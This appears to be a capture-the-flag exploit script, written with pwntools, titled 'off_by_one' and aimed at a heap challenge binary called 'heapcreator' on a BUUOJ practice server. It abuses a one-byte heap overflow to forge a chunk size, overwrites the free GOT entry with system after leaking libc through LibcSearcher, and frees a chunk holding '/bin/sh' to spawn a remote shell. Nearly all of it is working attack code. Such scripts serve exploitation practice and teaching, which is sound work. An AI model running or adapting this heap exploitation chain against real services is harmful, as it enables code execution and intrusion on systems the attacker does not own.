off_by_one

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

def add(size,contet):
    p.sendafter("Your choice :",b'1')
    p.sendafter("Size of Heap :",str(size))
    p.sendafter("Content of heap:",contet)

def edit(index,contet):
    p.sendafter("Your choice :",b'2')
    p.sendafter("Index :",str(index))
    p.sendafter("Content of heap :",contet)

def show(index):
    p.sendafter("Your choice :",b'3')
    p.sendafter("Index :", str(index))

def dele(index):
    p.sendafter("Your choice :",b'4')
    p.sendlineafter("Index :",str(index))

# p= process("./heapcreator")
p=remote("node4.buuoj.cn",27274)
add(0x18,b'a')
add(0x10,b'b')
add(0x10,b'c')
add(0x10,b'/bin/sh')
edit(0,b'a'*0x18+b'\x81')
dele(1)
add(0x70,b'a')
edit(1,0x10*b'b'+p64(0)+p64(0x21)+p64(0x40)+p64(0x000000000602018))
# attach(p)
show(1)
free=p.recvuntil("\x7f")[-6:]+b'\0'*2
free = u64(free)
print(hex(free))
libc=LibcSearcher("free",free)
system=libc.dump("system")
print(libc)
#attach(p)
edit(1,p64(system+free-libc.dump("free")))
dele(3)
p.interactive()